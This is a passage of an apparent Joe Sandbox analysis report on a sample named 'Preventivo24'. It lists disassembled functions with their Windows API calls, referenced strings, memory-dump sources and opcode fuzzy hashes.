RegCloseKey.ADVAPI32(?,01142730,00000000,01142730,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00EA124E
CloseHandle.KERNEL32(?,B5580983,?,?,00000000,010B67BD,000000FF,?,01142730,00000000,01142730,00000000,?,80000001,00000001,00000000), ref: 00EA12DE

Strings

Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00EA0F96
AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00EA1010

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Close$CreateErrorEventHandleLast
String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
API String ID: 1253123496-2079760225
Opcode ID: 07b16e19cebcbed4d95d85a040ea6f3eb6078c79b246090b53c30078a358b41a
Instruction ID: cad3825508563a9245341c45acb3fbcc0f8740312aa7bbcc757efe5eb4665773
Opcode Fuzzy Hash: 07b16e19cebcbed4d95d85a040ea6f3eb6078c79b246090b53c30078a358b41a
Instruction Fuzzy Hash: E4C1D070E00249DFDB14DF68C944BAEBBB5FF19304F14829DE459B7680DB74AA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E92BC0 Relevance: 10.7, APIs: 7, Instructions: 223memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 00E92CC0
SysFreeString.OLEAUT32(00000000), ref: 00E92D48
GetProcessHeap.KERNEL32(-000000FE,?,?), ref: 00E92DC0
HeapFree.KERNEL32(00000000,-000000FE,?,?), ref: 00E92DC6
GetProcessHeap.KERNEL32(-000000FE,00000000,?,00000000,00000000,00000000,B5580983,?,?,?), ref: 00E92DF3
HeapFree.KERNEL32(00000000,-000000FE,00000000,?,00000000,00000000,00000000,B5580983,?,?,?), ref: 00E92DF9
SysFreeString.OLEAUT32(00000000), ref: 00E92E11

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Free$Heap$String$Process
String ID:
API String ID: 2680101141-0
Opcode ID: 2d09136969b1e306829c2c9e0f1e7bcb28fe13f953eae8a079534c9a87ff44ad
Instruction ID: 80c8f30dec2b20cb4596c86559fd62b1a224cf5c7a4fea629b3657b62b88453f
Opcode Fuzzy Hash: 2d09136969b1e306829c2c9e0f1e7bcb28fe13f953eae8a079534c9a87ff44ad
Instruction Fuzzy Hash: 91916770D01219EFDF21EFA8C844BEEBBB4BF14314F244559E950BB281C7789A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E909AA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 212libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,.dll,00000004,?,00000000,01142730,00000000,00000000,00000000), ref: 00E90AB0
GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00E90AF9

Strings

DllGetActivationFactory, xrefs: 00E90AF3
.dll, xrefs: 00E90A97

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll$DllGetActivationFactory
API String ID: 2574300362-1250754257
Opcode ID: f8ec583f814e7df26a2481d534c76c54567a847baf8bd31b5ec73f2124957d14
Instruction ID: 934f402dfb3b7edf12f9ed1c9b97159cf1a987761aa195d5ec23fd3f3360d795
Opcode Fuzzy Hash: f8ec583f814e7df26a2481d534c76c54567a847baf8bd31b5ec73f2124957d14
Instruction Fuzzy Hash: 86918B70D10209DFDF19EFA8D8A5BEDFBB1AF54308FA49119E451B7290EBB05A44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E9C490 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159threadCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E,B5580983,?,?,?,00000000,00000000,?), ref: 00E9C4CF
GetCurrentThreadId.KERNEL32 ref: 00E9C513
EnterCriticalSection.KERNEL32(011D536C), ref: 00E9C533
LeaveCriticalSection.KERNEL32(011D536C), ref: 00E9C557
CreateWindowExW.USER32(?,?,00000000,011D536C,?,?,?,?,00000000,?,00000000), ref: 00E9C5B1

Part of subcall function 0108A23A: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00FEBA31,?,?,?), ref: 0108A23F
Part of subcall function 0108A23A: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0108A246

Strings

AXWIN UI Window, xrefs: 00E9C63A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
String ID: AXWIN UI Window
API String ID: 213679520-1592869507
Opcode ID: e2014016a0d1f59ce21efc2725e4ac5e913b7f2e482ffd28ecfc46a2ea8ceb5c
Instruction ID: b7df1fa3433855da5af56a072dd516493aa22943ca8928ee1e72c8f1191a4b4b
Opcode Fuzzy Hash: e2014016a0d1f59ce21efc2725e4ac5e913b7f2e482ffd28ecfc46a2ea8ceb5c
Instruction Fuzzy Hash: 6751A172604205AFDB24DF69ED05BAAFBF5FB54B14F20812EF914E7280D774A850CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00EA0C90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 150fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,B5580985), ref: 00EA0DD3
CloseHandle.KERNEL32(00000000), ref: 00EA0E30

Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A

WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00EA0E97
CloseHandle.KERNEL32(00000000,?), ref: 00EA0EBD

Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C

Strings

aix, xrefs: 00EA0D91
html, xrefs: 00EA0D8C

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireCloseFileHandleRelease$ConditionCreateVariableWakeWrite
String ID: aix$html
API String ID: 3683816281-2369804267
Opcode ID: 5f30b04383bf597a420799fc15761fe09f169b08cfb74161a7525be03ec466d0
Instruction ID: 9e07f3ef7c322110b9300a0ba604b46bef5d90d1755647acd0f302f725c05522
Opcode Fuzzy Hash: 5f30b04383bf597a420799fc15761fe09f169b08cfb74161a7525be03ec466d0
Instruction Fuzzy Hash: 4961C2B0D06244EFDB24DF94D908B9EBBF1BB15708F10451DE011AB280DBF56948CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00EBAC60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132windowstringCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 00EBACE1
lstrcpynW.KERNEL32(?,?,00000020), ref: 00EBAD61
MulDiv.KERNEL32(?,00000048,00000000), ref: 00EBAD9E
SendMessageW.USER32(?,00000444,00000000,00000074), ref: 00EBADD0

Strings

?, xrefs: 00EBADA4
t, xrefs: 00EBADAC

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$lstrcpyn
String ID: ?$t
API String ID: 3928028829-1995845436
Opcode ID: 694ad3331b11cf0e0d080a532722d460f81f67e1631a8e2bcbfd5d994753dc4f
Instruction ID: 5281cd0dfd252b39e0d797916085ce1f10bc6a1c5803f37f255a83daf33cfc7e
Opcode Fuzzy Hash: 694ad3331b11cf0e0d080a532722d460f81f67e1631a8e2bcbfd5d994753dc4f
Instruction Fuzzy Hash: C2519071609341AFE720DF60D849BDBBBE8FB48304F040929F599D7291DB74E648CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FBEE20 Relevance: 10.6, APIs: 7, Instructions: 118processsynchronizationCOMMON

Download Yara Rule

APIs

Wow64DisableWow64FsRedirection.KERNEL32(00000000,B5580983,00000000,00000000), ref: 00FBEE7B
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FBEEF3
GetLastError.KERNEL32 ref: 00FBEF04
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FBEF20
GetExitCodeProcess.KERNEL32(?,000000FF), ref: 00FBEF31
CloseHandle.KERNEL32(?), ref: 00FBEF3B
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00FBEF56

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Wow64$ProcessRedirection$CloseCodeCreateDisableErrorExitHandleLastObjectRevertSingleWait
String ID:
API String ID: 1153077990-0
Opcode ID: 2a9809fe7b8399c13d3e8466069daeea5bfa4ccf9fcf9d5c19888f6ebf26b874
Instruction ID: 61c0d77ccf67c07f108e96ec8c6c6a1693dae978fea9a35ac1c9dd1d0e2c374e
Opcode Fuzzy Hash: 2a9809fe7b8399c13d3e8466069daeea5bfa4ccf9fcf9d5c19888f6ebf26b874
Instruction Fuzzy Hash: 9E419171E043499BDB24CFA5CD447EEFBF8AF59310F148269E821A7284D7349980CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0108777E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,010877F9,0108775C,010879FD), ref: 01087795
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 010877AB
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 010877C0

Strings

KERNEL32.DLL, xrefs: 01087790
ReleaseSRWLockExclusive, xrefs: 010877B5
AcquireSRWLockExclusive, xrefs: 010877A5

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 5faf449094334e8fb2cc0206e997bf98ca40a4ff75bc14dcd5ac1c594554076d
Instruction ID: 99b9f7fe8c4a600f5c3243b4d99ca2ec64e3672e50c662971ed1a7168b4eaff6
Opcode Fuzzy Hash: 5faf449094334e8fb2cc0206e997bf98ca40a4ff75bc14dcd5ac1c594554076d
Instruction Fuzzy Hash: 30F0C83671A2615F6BB67DB9498066FFED87B0561433000B9EAD1D324CE710C480C790

Uniqueness

Uniqueness Score: -1.00%

Function 00EBDB50 Relevance: 9.2, APIs: 6, Instructions: 178windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00EBDBB7
SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00EBDBDD
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EBDBF5
SendMessageW.USER32(?,0000130A,00000000,?), ref: 00EBDC23
GetParent.USER32(?), ref: 00EBDD0B
SendMessageW.USER32(00000000,00000136,?,?), ref: 00EBDD1C

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$Parent
String ID:
API String ID: 1020955656-0
Opcode ID: c14ddb0feff6d3b57d756c5e17c7ba7c0d613e985fc39cdaf992bcef8df89ba5
Instruction ID: 1a759867709b31a8eaaa26c78826849b0b0efab600036e28a20ae2ea8449f5d3
Opcode Fuzzy Hash: c14ddb0feff6d3b57d756c5e17c7ba7c0d613e985fc39cdaf992bcef8df89ba5
Instruction Fuzzy Hash: 5E612672902618AFDB259FE4DD09FAEBBB9FF08700F100129F625AB294D7706940CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00F992F0 Relevance: 9.2, APIs: 6, Instructions: 170windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001036,00010000,00000000), ref: 00F99368
GetParent.USER32(00000000), ref: 00F993D4
GetWindowRect.USER32(00000000), ref: 00F993DB
GetParent.USER32(00000000), ref: 00F993EA

Part of subcall function 00F4BC20: GetWindowRect.USER32(?,?), ref: 00F4BCBB
Part of subcall function 00F4BC20: GetWindowRect.USER32(?,?), ref: 00F4BCD3

SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 00F994E6
SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 00F994FD

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageRectSendWindow$Parent
String ID:
API String ID: 425339167-0
Opcode ID: 79180b5f051dc16d140d9e214419b825757c704b049ed9e0f97449fa8474ada3
Instruction ID: 35b13045796d8201b1d9e1f8e9264e0e4976cfa7ce34b139a1f45ed90f54e1f4
Opcode Fuzzy Hash: 79180b5f051dc16d140d9e214419b825757c704b049ed9e0f97449fa8474ada3
Instruction Fuzzy Hash: 1D614B75D02218AFDB14CFA4C949BADFBB5FF48310F14422AE815B7384DB746985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EC5390 Relevance: 9.1, APIs: 6, Instructions: 142COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00EC53CD
std::_Lockit::_Lockit.LIBCPMT ref: 00EC53EF
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC5417
__Getcoll.LIBCPMT ref: 00EC54E1
std::_Facet_Register.LIBCPMT ref: 00EC5526
std::_Lockit::~_Lockit.LIBCPMT ref: 00EC5567

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: 9ecab00fc7ccbb4cc780a700a4a95a881698e60e1087597ce8907bc7cf9c1bf3
Instruction ID: 89fe5d1303ae64a48e330b680261f750714e378e74404830f46201ce7c9728af
Opcode Fuzzy Hash: 9ecab00fc7ccbb4cc780a700a4a95a881698e60e1087597ce8907bc7cf9c1bf3
Instruction Fuzzy Hash: 0351DD72C01618DFCB15DF98DA80B9DFBB1FF50314F60816ED8656B280DB35AA86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0108C20A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0108C201,0108C1C4,?,?,00EC253D,00FBBF30,?,00000008), ref: 0108C218
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0108C226
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0108C23F
SetLastError.KERNEL32(00000000,0108C201,0108C1C4,?,?,00EC253D,00FBBF30,?,00000008), ref: 0108C291

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: cea0882844a910032321757055224664decf585d1940514a337b141e3402eb7b
Instruction ID: 05d665858d26f485e14ea1cf5cf36537d69085f2d84c16b8a067019a3cfcf8f6
Opcode Fuzzy Hash: cea0882844a910032321757055224664decf585d1940514a337b141e3402eb7b
